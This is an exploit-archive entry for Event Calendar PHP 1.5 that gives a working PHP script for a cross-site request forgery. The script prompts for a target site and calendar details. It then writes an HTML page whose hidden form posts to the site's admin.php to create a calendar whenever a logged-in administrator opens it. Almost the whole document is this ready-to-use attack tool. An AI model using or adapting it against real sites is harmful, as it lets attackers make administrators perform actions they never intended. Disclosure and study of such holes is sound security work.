Event Calendar PHP 1.5 Cross Site Request Forgery



EKU-ID: 5956 CVE: OSVDB-ID:
Author: Ehsan Hosseini Published: 2016-10-25 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


<?php
#=====================================================
# Event Calendar PHP 1.5 - Cross-Site Request Forgery
#=====================================================
# Vendor Homepage: http://eventcalendarphp.com/
# Date: 21 Oct 2016
# Demo Link : http://eventcalendarphp.com/eventcalendar/admin.php
# Version : 1.5
# Platform : WebApp - PHP
# Author: Ashiyane Digital Security Team
# Contact: hehsan979@gmail.com
#=====================================================
print "
#######################################################################
#                   Event Calendar PHP 1.5 CSRF            			  #
#                   Discovered By Ehsan Hosseini                      #
#                  Ashiyane Digital Security Team                     #
#                          We Love Leader                             #
#######################################################################\n\n";
print 'Enter Site Url (localhost): ';
$site = htmlspecialchars(trim(fgets(STDIN,256)));
print 'Enter Calender Name: ';
$cal_name = htmlspecialchars(trim(fgets(STDIN,256)));
print 'Enter Description Name: ';
$description = htmlspecialchars(trim(fgets(STDIN,256)));

$poc = "<html>
	<!-- CSRF PoC -->
	<body>
		<form action='http://$site/admin.php' method='post' name='form'
enctype='multipart/form-data'>
			<input type='hidden' name='act' value='addCal'>
			<input type='hidden' name='cal_name' value='$cal_name'>
			<input type='hidden' name='description' value='$description'>
			<input name='submit' type='submit' value='Create Calendar'>
		</form>
	</body>
</html>";
print 'Enter Exploit name (csrfpoc)';
$pocname = trim(fgets(STDIN,256));

$exploit = fopen("$pocname.html", "w");
fwrite($exploit, $poc);
fclose($exploit);
#=====================================================
# Discovered By : Ehsan Hosseini
#=====================================================
?>